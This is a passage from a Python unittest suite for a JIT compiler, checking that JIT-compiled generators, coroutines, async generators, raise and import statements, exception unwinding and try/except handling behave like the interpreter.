        # f-string without a format spec, inside nested loops and an if.
        for a in it1:
            for b in it2:
                if flag:
                    return f"{a}"

    def test_fstring_no_fmt_spec_in_nested_loops_and_if(self):
        self.assertEqual(self._fstring(True, [1], [1]), "1")

    @unittest.failUnlessJITCompiled
    async def _sharedAwait(self, x, y, z):
        # Both branches of the conditional feed one shared await site.
        return await (x() if y else z())

    def test_shared_await(self):
        async def zero():
            return 0

        async def one():
            return 1

        with self.assertRaises(StopIteration) as exc:
            self._sharedAwait(zero, True, one).send(None)
        self.assertEqual(exc.exception.value, 0)
        with self.assertRaises(StopIteration) as exc:
            self._sharedAwait(zero, False, one).send(None)
        self.assertEqual(exc.exception.value, 1)
class DelObserver:
    """Object that reports its own destruction.

    When the instance is finalized, ``cb(id)`` is invoked, letting tests
    observe exactly which objects were collected and when.
    """

    def __init__(self, id, cb):
        self.id, self.cb = id, cb

    def __del__(self):
        notify = self.cb
        notify(self.id)
class UnwindStateTests(unittest.TestCase):
    """Tests that exception unwind in JIT-compiled frames reproduces the
    interpreter's behavior: materialized locals and decrefed stack items."""

    # Shared list recording DelObserver ids as they are finalized.
    DELETED = []

    def setUp(self):
        self.DELETED.clear()
        self.addCleanup(lambda: self.DELETED.clear())

    def get_del_observer(self, id):
        return DelObserver(id, lambda i: self.DELETED.append(i))

    @unittest.failUnlessJITCompiled
    def _copied_locals(self, a):
        # Chained assignment: b and c alias a; all three must appear in
        # the frame's f_locals after the raise.
        b = c = a
        raise RuntimeError()

    def test_copied_locals_in_frame(self):
        try:
            self._copied_locals("hello")
        except RuntimeError as re:
            f_locals = re.__traceback__.tb_next.tb_frame.f_locals
            self.assertEqual(
                f_locals, {"self": self, "a": "hello", "b": "hello", "c": "hello"}
            )

    @unittest.failUnlessJITCompiled
    def _raise_with_del_observer_on_stack(self):
        # The genexp keeps a DelObserver alive on the value stack at the
        # moment of the raise.
        for x in (1 for i in [self.get_del_observer(1)]):
            raise RuntimeError()

    def test_decref_stack_objects(self):
        """Items on stack should be decrefed on unwind."""
        try:
            self._raise_with_del_observer_on_stack()
        except RuntimeError:
            deleted = list(self.DELETED)
        else:
            self.fail("should have raised RuntimeError")
        self.assertEqual(deleted, [1])

    @unittest.failUnlessJITCompiled
    def _raise_with_del_observer_on_stack_and_cell_arg(self):
        # `self` is a cell here (the genexp closes over it), which is the
        # shape that triggered the original bug.
        for x in (self for i in [self.get_del_observer(1)]):
            raise RuntimeError()

    def test_decref_stack_objs_with_cell_args(self):
        # Regression test for a JIT bug in which the unused locals slot for a
        # local-which-is-a-cell would end up getting populated on unwind with
        # some unrelated stack object, preventing it from being decrefed.
        try:
            self._raise_with_del_observer_on_stack_and_cell_arg()
        except RuntimeError:
            deleted = list(self.DELETED)
        else:
            self.fail("should have raised RuntimeError")
        self.assertEqual(deleted, [1])
class ImportTests(unittest.TestCase):
    """IMPORT_NAME / IMPORT_FROM behavior in JIT-compiled code, on both
    success and failure paths."""

    @unittest.failUnlessJITCompiled
    def test_import_name(self):
        import math

        self.assertEqual(int(math.pow(1, 2)), 1)

    @unittest.failUnlessJITCompiled
    def _fail_to_import_name(self):
        import non_existent_module

    def test_import_name_failure(self):
        with self.assertRaises(ModuleNotFoundError):
            self._fail_to_import_name()

    @unittest.failUnlessJITCompiled
    def test_import_from(self):
        from math import pow as math_pow

        self.assertEqual(int(math_pow(1, 2)), 1)

    @unittest.failUnlessJITCompiled
    def _fail_to_import_from(self):
        from math import non_existent_attr

    def test_import_from_failure(self):
        with self.assertRaises(ImportError):
            self._fail_to_import_from()
class RaiseTests(unittest.TestCase):
    """RAISE_VARARGS forms in JIT-compiled code: raise type, raise value,
    raise ... from ..., and bare re-raise."""

    @unittest.failUnlessJITCompiled
    def _jitRaise(self, exc):
        raise exc

    @unittest.failUnlessJITCompiled
    def _jitRaiseCause(self, exc, cause):
        raise exc from cause

    @unittest.failUnlessJITCompiled
    def _jitReraise(self):
        # Bare raise: re-raises the currently-handled exception, or
        # RuntimeError when there is none.
        raise

    def test_raise_type(self):
        with self.assertRaises(ValueError):
            self._jitRaise(ValueError)

    def test_raise_value(self):
        with self.assertRaises(ValueError) as exc:
            self._jitRaise(ValueError(1))
        self.assertEqual(exc.exception.args, (1,))

    def test_raise_with_cause(self):
        # The cause's traceback must be preserved across `raise ... from`.
        cause = ValueError(2)
        cause_tb_str = f"{cause.__traceback__}"
        with self.assertRaises(ValueError) as exc:
            self._jitRaiseCause(ValueError(1), cause)
        self.assertIs(exc.exception.__cause__, cause)
        self.assertEqual(f"{exc.exception.__cause__.__traceback__}", cause_tb_str)

    def test_reraise(self):
        original_raise = ValueError(1)
        with self.assertRaises(ValueError) as exc:
            try:
                raise original_raise
            except ValueError:
                self._jitReraise()
        self.assertIs(exc.exception, original_raise)

    def test_reraise_of_nothing(self):
        with self.assertRaises(RuntimeError) as exc:
            self._jitReraise()
        self.assertEqual(exc.exception.args, ("No active exception to reraise",))
class GeneratorsTest(unittest.TestCase):
    """End-to-end tests for JIT-compiled generators: yield/send/return,
    throw/close, yield-from delegation, GC traversal, and the generator
    data freelist. Helper generators (_f1.._f12) are shaped deliberately;
    do not restructure them."""

    @unittest.failUnlessJITCompiled
    def _f1(self):
        yield 1

    def test_basic_operation(self):
        g = self._f1()
        self.assertEqual(g.send(None), 1)
        with self.assertRaises(StopIteration) as exc:
            g.send(None)
        self.assertIsNone(exc.exception.value)

    @unittest.failUnlessJITCompiled
    def _f2(self):
        yield 1
        yield 2
        return 3

    def test_multi_yield_and_return(self):
        g = self._f2()
        self.assertEqual(g.send(None), 1)
        self.assertEqual(g.send(None), 2)
        with self.assertRaises(StopIteration) as exc:
            g.send(None)
        self.assertEqual(exc.exception.value, 3)

    @unittest.failUnlessJITCompiled
    def _f3(self):
        # Values sent in must be bound to the yield-expression results.
        a = yield 1
        b = yield 2
        return a + b

    def test_receive_values(self):
        g = self._f3()
        self.assertEqual(g.send(None), 1)
        self.assertEqual(g.send(100), 2)
        with self.assertRaises(StopIteration) as exc:
            g.send(1000)
        self.assertEqual(exc.exception.value, 1100)

    @unittest.failUnlessJITCompiled
    def _f4(self, a):
        yield a
        yield a
        return a

    def test_one_arg(self):
        g = self._f4(10)
        self.assertEqual(g.send(None), 10)
        self.assertEqual(g.send(None), 10)
        with self.assertRaises(StopIteration) as exc:
            g.send(None)
        self.assertEqual(exc.exception.value, 10)

    @unittest.failUnlessJITCompiled
    def _f5(
        self, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16
    ):
        # 16 live locals across two yields: forces the JIT to save all
        # registers and spill across suspend/resume.
        v = (
            yield a1
            + a2
            + a3
            + a4
            + a5
            + a6
            + a7
            + a8
            + a9
            + a10
            + a11
            + a12
            + a13
            + a14
            + a15
            + a16
        )
        a1 <<= v
        a2 <<= v
        a3 <<= v
        a4 <<= v
        a5 <<= v
        a6 <<= v
        a7 <<= v
        a8 <<= v
        a9 <<= v
        a10 <<= v
        a11 <<= v
        a12 <<= v
        a13 <<= v
        a14 <<= v
        a15 <<= v
        a16 <<= v
        v = (
            yield a1
            + a2
            + a3
            + a4
            + a5
            + a6
            + a7
            + a8
            + a9
            + a10
            + a11
            + a12
            + a13
            + a14
            + a15
            + a16
        )
        a1 <<= v
        a2 <<= v
        a3 <<= v
        a4 <<= v
        a5 <<= v
        a6 <<= v
        a7 <<= v
        a8 <<= v
        a9 <<= v
        a10 <<= v
        a11 <<= v
        a12 <<= v
        a13 <<= v
        a14 <<= v
        a15 <<= v
        a16 <<= v
        return (
            a1
            + a2
            + a3
            + a4
            + a5
            + a6
            + a7
            + a8
            + a9
            + a10
            + a11
            + a12
            + a13
            + a14
            + a15
            + a16
        )

    def test_save_all_registers_and_spill(self):
        # Distinct bit per argument so any lost/clobbered value is visible.
        g = self._f5(
            0x1,
            0x2,
            0x4,
            0x8,
            0x10,
            0x20,
            0x40,
            0x80,
            0x100,
            0x200,
            0x400,
            0x800,
            0x1000,
            0x2000,
            0x4000,
            0x8000,
        )
        self.assertEqual(g.send(None), 0xFFFF)
        self.assertEqual(g.send(1), 0xFFFF << 1)
        with self.assertRaises(StopIteration) as exc:
            g.send(2)
        self.assertEqual(exc.exception.value, 0xFFFF << 3)

    def test_for_loop_driven(self):
        l = []
        for x in self._f2():
            l.append(x)
        self.assertEqual(l, [1, 2])

    @unittest.failUnlessJITCompiled
    def _f6(self):
        i = 0
        while i < 1000:
            i = yield i

    def test_many_iterations(self):
        g = self._f6()
        self.assertEqual(g.send(None), 0)
        for i in range(1, 1000):
            self.assertEqual(g.send(i), i)
        with self.assertRaises(StopIteration) as exc:
            g.send(1000)
        self.assertIsNone(exc.exception.value)

    def _f_raises(self):
        raise ValueError

    @unittest.failUnlessJITCompiled
    def _f7(self):
        # Raises before reaching the first yield.
        self._f_raises()
        yield 1

    def test_raise(self):
        g = self._f7()
        with self.assertRaises(ValueError):
            g.send(None)

    def test_throw_into_initial_yield(self):
        g = self._f1()
        with self.assertRaises(ValueError):
            g.throw(ValueError)

    def test_throw_into_yield(self):
        g = self._f2()
        self.assertEqual(g.send(None), 1)
        with self.assertRaises(ValueError):
            g.throw(ValueError)

    def test_close_on_initial_yield(self):
        g = self._f1()
        g.close()

    def test_close_on_yield(self):
        g = self._f2()
        self.assertEqual(g.send(None), 1)
        g.close()

    @unittest.failUnlessJITCompiled
    def _f8(self, a):
        # `x` is read (augmented-assigned) before binding: raises
        # UnboundLocalError only after the first resume.
        x += yield a

    def test_do_not_deopt_before_initial_yield(self):
        g = self._f8(1)
        with self.assertRaises(UnboundLocalError):
            g.send(None)

    @unittest.failUnlessJITCompiled
    def _f9(self, a):
        yield
        return a

    def test_incref_args(self):
        # The argument must stay alive across the suspend.
        class X:
            pass

        g = self._f9(X())
        g.send(None)
        with self.assertRaises(StopIteration) as exc:
            g.send(None)
        self.assertIsInstance(exc.exception.value, X)

    @unittest.failUnlessJITCompiled
    def _f10(self, X):
        x = X()
        yield weakref.ref(x)
        return x

    def test_gc_traversal(self):
        # A suspended generator's live locals must be reachable through
        # GC traversal (via the generator itself when JIT-compiled,
        # via its frame otherwise).
        class X:
            pass

        g = self._f10(X)
        weak_ref_x = g.send(None)
        self.assertIn(weak_ref_x(), gc.get_objects())
        referrers = gc.get_referrers(weak_ref_x())
        self.assertEqual(len(referrers), 1)
        if unittest.case.CINDERJIT_ENABLED:
            self.assertIs(referrers[0], g)
        else:
            self.assertIs(referrers[0], g.gi_frame)
        with self.assertRaises(StopIteration):
            g.send(None)

    def test_resuming_in_another_thread(self):
        g = self._f1()

        def thread_function(g):
            self.assertEqual(g.send(None), 1)
            with self.assertRaises(StopIteration):
                g.send(None)

        t = threading.Thread(target=thread_function, args=(g,))
        t.start()
        t.join()

    def test_release_data_on_discard(self):
        # Discarding a suspended generator must drop its reference to
        # captured arguments.
        o = object()
        base_count = sys.getrefcount(o)
        g = self._f9(o)
        self.assertEqual(sys.getrefcount(o), base_count + 1)
        del g
        self.assertEqual(sys.getrefcount(o), base_count)

    @unittest.failUnlessJITCompiled
    def _f12(self, g):
        a = yield from g
        return a

    def test_yield_from_generator(self):
        g = self._f12(self._f2())
        self.assertEqual(g.send(None), 1)
        self.assertEqual(g.send(None), 2)
        with self.assertRaises(StopIteration) as exc:
            g.send(None)
        self.assertEqual(exc.exception.value, 3)

    def test_yield_from_iterator(self):
        g = self._f12([1, 2])
        self.assertEqual(g.send(None), 1)
        self.assertEqual(g.send(None), 2)
        with self.assertRaises(StopIteration):
            g.send(None)

    def test_yield_from_forwards_raise_down(self):
        def f():
            try:
                yield 1
            except ValueError:
                return 2
            return 3

        g = self._f12(f())
        self.assertEqual(g.send(None), 1)
        with self.assertRaises(StopIteration) as exc:
            g.throw(ValueError)
        self.assertEqual(exc.exception.value, 2)

    def test_yield_from_forwards_raise_up(self):
        def f():
            raise ValueError
            yield 1

        g = self._f12(f())
        with self.assertRaises(ValueError):
            g.send(None)

    def test_yield_from_passes_raise_through(self):
        g = self._f12(self._f2())
        self.assertEqual(g.send(None), 1)
        with self.assertRaises(ValueError):
            g.throw(ValueError)

    def test_yield_from_forwards_close_down(self):
        saw_close = False

        def f():
            nonlocal saw_close
            try:
                yield 1
            except GeneratorExit:
                saw_close = True
            return 2

        g = self._f12(f())
        self.assertEqual(g.send(None), 1)
        g.close()
        self.assertTrue(saw_close)

    def test_yield_from_passes_close_through(self):
        g = self._f12(self._f2())
        self.assertEqual(g.send(None), 1)
        g.close()

    def test_assert_on_yield_from_coro(self):
        async def coro():
            pass

        c = coro()
        with self.assertRaises(TypeError) as exc:
            self._f12(c).send(None)
        self.assertEqual(
            str(exc.exception),
            "cannot 'yield from' a coroutine object in a non-coroutine generator",
        )
        # Suppress warning
        c.close()

    def test_gen_freelist(self):
        """Exercise making a JITted generator with gen_data memory off the freelist."""
        # make and dealloc a small coro, which will put its memory area on the freelist
        sc = self.small_coro()
        with self.assertRaises(StopIteration):
            sc.send(None)
        del sc
        # run another coro to verify we didn't put a bad pointer on the freelist
        sc2 = self.small_coro()
        with self.assertRaises(StopIteration):
            sc2.send(None)
        del sc2
        # make a big coro and then deallocate it, bypassing the freelist
        bc = self.big_coro()
        with self.assertRaises(StopIteration):
            bc.send(None)
        del bc

    @unittest.failUnlessJITCompiled
    async def big_coro(self):
        # This currently results in a max spill size of ~100, but that could
        # change with JIT register allocation improvements. This test is only
        # testing what it intends to as long as the max spill size of this
        # function is greater than jit::kMinGenSpillWords. Ideally we'd assert
        # that in the test, but neither value is introspectable from Python.
        return dict(
            a=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
            b=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
            c=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
            d=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
            e=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
            f=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
            g=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
            h=dict(a=1, b=2, c=3, d=4, e=5, f=6, g=7, h=8, i=9),
        )

    @unittest.failUnlessJITCompiled
    async def small_coro(self):
        return 1

    def test_generator_globals(self):
        # A suspended generator must observe mutations to its globals
        # dict between resumptions, and keep the dict alive itself.
        val1 = "a value"
        val2 = "another value"
        gbls = {"A_GLOBAL": val1}

        @with_globals(gbls)
        def gen():
            yield A_GLOBAL
            yield A_GLOBAL

        g = gen()
        self.assertIs(g.__next__(), val1)
        gbls["A_GLOBAL"] = val2
        del gbls
        self.assertIs(g.__next__(), val2)
        with self.assertRaises(StopIteration):
            g.__next__()
class GeneratorFrameTest(unittest.TestCase):
    """gi_frame must be stable and consistent whether it is first
    materialized before, between, or during resumptions."""

    @unittest.failUnlessJITCompiled
    def gen1(self):
        a = 1
        yield a
        a = 2
        yield a

    def test_access_before_send(self):
        g = self.gen1()
        f = g.gi_frame
        self.assertEqual(next(g), 1)
        self.assertEqual(g.gi_frame, f)
        self.assertEqual(next(g), 2)
        self.assertEqual(g.gi_frame, f)

    def test_access_after_send(self):
        g = self.gen1()
        self.assertEqual(next(g), 1)
        f = g.gi_frame
        self.assertEqual(next(g), 2)
        self.assertEqual(g.gi_frame, f)

    @unittest.failUnlessJITCompiled
    def gen2(self):
        # Reads its own gi_frame while running (the generator object is
        # sent into itself).
        me = yield
        f = me.gi_frame
        yield f
        yield 10

    def test_access_while_running(self):
        g = self.gen2()
        next(g)
        f = g.send(g)
        self.assertEqual(f, g.gi_frame)
        next(g)
class CoroutinesTest(unittest.TestCase):
    """JIT-compiled coroutines: await, async with, interaction with
    asyncio, and error paths for already-awaited coroutines."""

    @unittest.failUnlessJITCompiled
    async def _f1(self):
        return 1

    @unittest.failUnlessJITCompiled
    async def _f2(self, await_target):
        return await await_target

    def test_basic_coroutine(self):
        c = self._f2(self._f1())
        with self.assertRaises(StopIteration) as exc:
            c.send(None)
        self.assertEqual(exc.exception.value, 1)

    def test_cannot_await_coro_already_awaiting_on_a_sub_iterator(self):
        class DummyAwaitable:
            def __await__(self):
                return iter([1])

        c = self._f2(DummyAwaitable())
        self.assertEqual(c.send(None), 1)
        with self.assertRaises(RuntimeError) as exc:
            self._f2(c).send(None)
        self.assertEqual(str(exc.exception), "coroutine is being awaited already")

    def test_works_with_asyncio(self):
        try:
            asyncio.run(self._f2(asyncio.sleep(0.1)))
        finally:
            # This is needed to avoid an "environment changed" error
            asyncio.set_event_loop_policy(None)

    @unittest.failUnlessJITCompiled
    @asyncio.coroutine
    def _f3(self):
        # Legacy generator-based ("pre-async") coroutine.
        yield 1
        return 2

    def test_pre_async_coroutine(self):
        c = self._f3()
        self.assertEqual(c.send(None), 1)
        with self.assertRaises(StopIteration) as exc:
            c.send(None)
        self.assertEqual(exc.exception.value, 2)

    @staticmethod
    @unittest.failUnlessJITCompiled
    async def _use_async_with(mgr_type):
        async with mgr_type():
            pass

    def test_bad_awaitable_in_with(self):
        # __aenter__/__aexit__ that return non-awaitables must produce
        # the interpreter's exact TypeError messages.
        class BadAEnter:
            def __aenter__(self):
                pass

            async def __aexit__(self, exc, ty, tb):
                pass

        class BadAExit:
            async def __aenter__(self):
                pass

            def __aexit__(self, exc, ty, tb):
                pass

        with self.assertRaisesRegex(
            TypeError,
            "'async with' received an object from __aenter__ "
            "that does not implement __await__: NoneType",
        ):
            asyncio.run(self._use_async_with(BadAEnter))
        with self.assertRaisesRegex(
            TypeError,
            "'async with' received an object from __aexit__ "
            "that does not implement __await__: NoneType",
        ):
            asyncio.run(self._use_async_with(BadAExit))

    class FakeFuture:
        # Awaitable that yields its payload exactly once, then clears it.
        def __init__(self, obj):
            self._obj = obj

        def __await__(self):
            i = iter([self._obj])
            self._obj = None
            return i

    @unittest.skipUnlessCinderJITEnabled("Exercises JIT-specific bug")
    def test_jit_coro_awaits_interp_coro(self):
        @cinderjit.jit_suppress
        async def eager_suspend(suffix):
            await self.FakeFuture("hello, " + suffix)

        @unittest.failUnlessJITCompiled
        async def jit_coro():
            await eager_suspend("bob")

        coro = jit_coro()
        v1 = coro.send(None)
        with self.assertRaises(StopIteration):
            coro.send(None)
        self.assertEqual(v1, "hello, bob")

    def assert_already_awaited(self, coro):
        with self.assertRaisesRegex(RuntimeError, "coroutine is being awaited already"):
            asyncio.run(coro)

    def test_already_awaited_coroutine_in_try_except(self):
        """Except blocks should execute when a coroutine is already awaited"""

        async def f():
            await asyncio.sleep(0.1)

        executed_except_block = False

        async def runner():
            nonlocal executed_except_block
            coro = f()
            loop = asyncio.get_running_loop()
            t = loop.create_task(coro)
            try:
                await asyncio.sleep(0)
                await coro
            except RuntimeError:
                executed_except_block = True
                t.cancel()
                raise

        self.assert_already_awaited(runner())
        self.assertTrue(executed_except_block)

    def test_already_awaited_coroutine_in_try_finally(self):
        """Finally blocks should execute when a coroutine is already awaited"""

        async def f():
            await asyncio.sleep(0.1)

        executed_finally_block = False

        async def runner():
            nonlocal executed_finally_block
            coro = f()
            loop = asyncio.get_running_loop()
            t = loop.create_task(coro)
            try:
                await asyncio.sleep(0)
                await coro
            finally:
                executed_finally_block = True
                t.cancel()

        self.assert_already_awaited(runner())
        self.assertTrue(executed_finally_block)

    def test_already_awaited_coroutine_in_try_except_finally(self):
        """Except and finally blocks should execute when a coroutine is already
        awaited.
        """

        async def f():
            await asyncio.sleep(0.1)

        executed_except_block = False
        executed_finally_block = False

        async def runner():
            nonlocal executed_except_block, executed_finally_block
            coro = f()
            loop = asyncio.get_running_loop()
            t = loop.create_task(coro)
            try:
                await asyncio.sleep(0)
                await coro
            except RuntimeError:
                executed_except_block = True
                raise
            finally:
                executed_finally_block = True
                t.cancel()

        self.assert_already_awaited(runner())
        self.assertTrue(executed_except_block)
        self.assertTrue(executed_finally_block)
class EagerCoroutineDispatch(StaticTestBase):
    """Verify that each JIT call shape (CALL_FUNCTION_EX, CALL_METHOD,
    vector calls, INVOKE_FUNCTION/METHOD) passes the awaited flag if and
    only if the result is directly awaited, using
    _testcapi.TestAwaitedCall to capture the flag."""

    def _assert_awaited_flag_seen(self, async_f_under_test):
        awaited_capturer = _testcapi.TestAwaitedCall()
        self.assertIsNone(awaited_capturer.last_awaited())
        coro = async_f_under_test(awaited_capturer)
        # TestAwaitedCall doesn't actually return a coroutine. This doesn't
        # matter though because by the time a TypeError is raised we run far
        # enough to know if the awaited flag was passed.
        with self.assertRaisesRegex(
            TypeError, r".*can't be used in 'await' expression"
        ):
            coro.send(None)
        coro.close()
        self.assertTrue(awaited_capturer.last_awaited())
        # last_awaited() resets on read.
        self.assertIsNone(awaited_capturer.last_awaited())

    def _assert_awaited_flag_not_seen(self, async_f_under_test):
        awaited_capturer = _testcapi.TestAwaitedCall()
        self.assertIsNone(awaited_capturer.last_awaited())
        coro = async_f_under_test(awaited_capturer)
        with self.assertRaises(StopIteration):
            coro.send(None)
        coro.close()
        self.assertFalse(awaited_capturer.last_awaited())
        self.assertIsNone(awaited_capturer.last_awaited())

    @unittest.failUnlessJITCompiled
    async def _call_ex(self, t):
        t(*[1])

    @unittest.failUnlessJITCompiled
    async def _call_ex_awaited(self, t):
        await t(*[1])

    @unittest.failUnlessJITCompiled
    async def _call_ex_kw(self, t):
        t(*[1], **{2: 3})

    @unittest.failUnlessJITCompiled
    async def _call_ex_kw_awaited(self, t):
        await t(*[1], **{2: 3})

    @unittest.failUnlessJITCompiled
    async def _call_method(self, t):
        # https://stackoverflow.com/questions/19476816/creating-an-empty-object-in-python
        o = type("", (), {})()
        o.t = t
        o.t()

    @unittest.failUnlessJITCompiled
    async def _call_method_awaited(self, t):
        o = type("", (), {})()
        o.t = t
        await o.t()

    @unittest.failUnlessJITCompiled
    async def _vector_call(self, t):
        t()

    @unittest.failUnlessJITCompiled
    async def _vector_call_awaited(self, t):
        await t()

    @unittest.failUnlessJITCompiled
    async def _vector_call_kw(self, t):
        t(a=1)

    @unittest.failUnlessJITCompiled
    async def _vector_call_kw_awaited(self, t):
        await t(a=1)

    def test_call_ex(self):
        self._assert_awaited_flag_not_seen(self._call_ex)

    def test_call_ex_awaited(self):
        self._assert_awaited_flag_seen(self._call_ex_awaited)

    def test_call_ex_kw(self):
        self._assert_awaited_flag_not_seen(self._call_ex_kw)

    def test_call_ex_kw_awaited(self):
        self._assert_awaited_flag_seen(self._call_ex_kw_awaited)

    def test_call_method(self):
        self._assert_awaited_flag_not_seen(self._call_method)

    def test_call_method_awaited(self):
        self._assert_awaited_flag_seen(self._call_method_awaited)

    def test_vector_call(self):
        self._assert_awaited_flag_not_seen(self._vector_call)

    def test_vector_call_awaited(self):
        self._assert_awaited_flag_seen(self._vector_call_awaited)

    def test_vector_call_kw(self):
        self._assert_awaited_flag_not_seen(self._vector_call_kw)

    def test_vector_call_kw_awaited(self):
        self._assert_awaited_flag_seen(self._vector_call_kw_awaited)

    def test_invoke_function(self):
        codestr = f"""
        def x() -> None:
            pass
        async def await_x() -> None:
            await x()
        async def call_x() -> None:
            c = x()
        """
        c = self.compile(codestr, StaticCodeGenerator, modname="test_invoke_function")
        await_x = self.find_code(c, "await_x")
        self.assertInBytecode(
            await_x, "INVOKE_FUNCTION", (("test_invoke_function", "x"), 0)
        )
        call_x = self.find_code(c, "call_x")
        self.assertInBytecode(
            call_x, "INVOKE_FUNCTION", (("test_invoke_function", "x"), 0)
        )
        with self.in_module(codestr) as mod:
            # Patch x with the awaited-flag capturer after compilation.
            mod.x = _testcapi.TestAwaitedCall()
            self.assertIsInstance(mod.x, _testcapi.TestAwaitedCall)
            self.assertIsNone(mod.x.last_awaited())
            coro = mod.await_x()
            with self.assertRaisesRegex(
                TypeError, r".*can't be used in 'await' expression"
            ):
                coro.send(None)
            coro.close()
            self.assertTrue(mod.x.last_awaited())
            self.assertIsNone(mod.x.last_awaited())
            coro = mod.call_x()
            with self.assertRaises(StopIteration):
                coro.send(None)
            coro.close()
            self.assertFalse(mod.x.last_awaited())
            if cinderjit:
                self.assertTrue(cinderjit.is_jit_compiled(mod.await_x))
                self.assertTrue(cinderjit.is_jit_compiled(mod.call_x))

    def test_invoke_method(self):
        codestr = f"""
        class X:
            def x(self) -> None:
                pass
        async def await_x() -> None:
            await X().x()
        async def call_x() -> None:
            X().x()
        """
        c = self.compile(codestr, StaticCodeGenerator, modname="test_invoke_method")
        await_x = self.find_code(c, "await_x")
        self.assertInBytecode(
            await_x, "INVOKE_METHOD", (("test_invoke_method", "X", "x"), 0)
        )
        call_x = self.find_code(c, "call_x")
        self.assertInBytecode(
            call_x, "INVOKE_METHOD", (("test_invoke_method", "X", "x"), 0)
        )
        with self.in_module(codestr) as mod:
            awaited_capturer = mod.X.x = _testcapi.TestAwaitedCall()
            self.assertIsNone(awaited_capturer.last_awaited())
            coro = mod.await_x()
            with self.assertRaisesRegex(
                TypeError, r".*can't be used in 'await' expression"
            ):
                coro.send(None)
            coro.close()
            self.assertTrue(awaited_capturer.last_awaited())
            self.assertIsNone(awaited_capturer.last_awaited())
            coro = mod.call_x()
            with self.assertRaises(StopIteration):
                coro.send(None)
            coro.close()
            self.assertFalse(awaited_capturer.last_awaited())
            if cinderjit:
                self.assertTrue(cinderjit.is_jit_compiled(mod.await_x))
                self.assertTrue(cinderjit.is_jit_compiled(mod.call_x))

    # NOTE(review): this class-level coroutine references DummyAwaitable,
    # which is only defined locally inside test_async_yielding below; y()
    # would raise NameError if ever awaited. Looks like dead/leftover code
    # -- confirm against upstream before removing.
    async def y():
        await DummyAwaitable()

    def test_async_yielding(self):
        class DummyAwaitable:
            def __await__(self):
                return iter([1, 2])

        coro = self._vector_call_awaited(DummyAwaitable)
        self.assertEqual(coro.send(None), 1)
        self.assertEqual(coro.send(None), 2)
class AsyncGeneratorsTest(unittest.TestCase):
    """JIT-compiled async generators: asend stepping, async-for
    iteration, async comprehensions, and traceback shape on errors."""

    @unittest.failUnlessJITCompiled
    async def _f1(self, awaitable):
        x = yield 1
        yield x
        await awaitable

    def test_basic_coroutine(self):
        class DummyAwaitable:
            def __await__(self):
                return iter([3])

        async_gen = self._f1(DummyAwaitable())
        # Step 1: move through "yield 1"
        async_itt1 = async_gen.asend(None)
        with self.assertRaises(StopIteration) as exc:
            async_itt1.send(None)
        self.assertEqual(exc.exception.value, 1)
        # Step 2: send in and receive out 2 via "yield x"
        async_itt2 = async_gen.asend(2)
        with self.assertRaises(StopIteration) as exc:
            async_itt2.send(None)
        self.assertEqual(exc.exception.value, 2)
        # Step 3: yield of "3" from DummyAwaitable
        async_itt3 = async_gen.asend(None)
        self.assertEqual(async_itt3.send(None), 3)
        # Step 4: complete
        with self.assertRaises(StopAsyncIteration):
            async_itt3.send(None)

    @unittest.failUnlessJITCompiled
    async def _f2(self, asyncgen):
        res = []
        async for x in asyncgen:
            res.append(x)
        return res

    def test_for_iteration(self):
        async def asyncgen():
            yield 1
            yield 2

        self.assertEqual(asyncio.run(self._f2(asyncgen())), [1, 2])

    def _assertExceptionFlowsThroughYieldFrom(self, exc):
        # Walk to the second-to-last traceback frame and check the
        # instruction active there is a YIELD_FROM.
        tb_prev = None
        tb = exc.__traceback__
        while tb.tb_next:
            tb_prev = tb
            tb = tb.tb_next
        instrs = [x for x in dis.get_instructions(tb_prev.tb_frame.f_code)]
        self.assertEqual(instrs[tb_prev.tb_lasti // 2].opname, "YIELD_FROM")

    def test_for_exception(self):
        async def asyncgen():
            yield 1
            raise ValueError

        # Can't use self.assertRaises() as this clears exception tracebacks
        try:
            asyncio.run(self._f2(asyncgen()))
        except ValueError as e:
            self._assertExceptionFlowsThroughYieldFrom(e)
        else:
            self.fail("Expected ValueError to be raised")

    @unittest.failUnlessJITCompiled
    async def _f3(self, asyncgen):
        return [x async for x in asyncgen]

    def test_comprehension(self):
        async def asyncgen():
            yield 1
            yield 2

        self.assertEqual(asyncio.run(self._f3(asyncgen())), [1, 2])

    def test_comprehension_exception(self):
        async def asyncgen():
            yield 1
            raise ValueError

        # Can't use self.assertRaises() as this clears exception tracebacks
        try:
            asyncio.run(self._f3(asyncgen()))
        except ValueError as e:
            self._assertExceptionFlowsThroughYieldFrom(e)
        else:
            self.fail("Expected ValueError to be raised")
class Err1(Exception):
    # Distinct exception type used to test multi-clause `except` dispatch below.
    pass
class Err2(Exception):
    # Second distinct exception type; see ExceptionHandlingTests.catch_multiple.
    pass
class ExceptionHandlingTests(unittest.TestCase):
    """Exercises JIT compilation of try/except/finally constructs.

    Each `failUnlessJITCompiled` method has a deliberately chosen control-flow
    shape (bare except, nested handlers, return/break/continue inside finally);
    the shapes themselves are what is being tested -- do not restructure.
    """

    @unittest.failUnlessJITCompiled
    def try_except(self, func):
        # Bare except on purpose: the handler shape is under test.
        try:
            func()
        except:
            return True
        return False

    def test_raise_and_catch(self):
        def f():
            raise Exception("hello")

        self.assertTrue(self.try_except(f))

        def g():
            pass

        self.assertFalse(self.try_except(g))

    @unittest.failUnlessJITCompiled
    def catch_multiple(self, func):
        # Two typed except clauses; returns None if func() doesn't raise either.
        try:
            func()
        except Err1:
            return 1
        except Err2:
            return 2

    def test_multiple_except_blocks(self):
        def f():
            raise Err1("err1")

        self.assertEqual(self.catch_multiple(f), 1)

        def g():
            raise Err2("err2")

        self.assertEqual(self.catch_multiple(g), 2)

    @unittest.failUnlessJITCompiled
    def reraise(self, func):
        # Bare `raise` inside a handler re-raises the active exception.
        try:
            func()
        except:
            raise

    def test_reraise(self):
        def f():
            raise Exception("hello")

        with self.assertRaisesRegex(Exception, "hello"):
            self.reraise(f)

    @unittest.failUnlessJITCompiled
    def try_except_in_loop(self, niters, f):
        # Nested handlers inside a loop; Err1 breaks out, Err2 is swallowed.
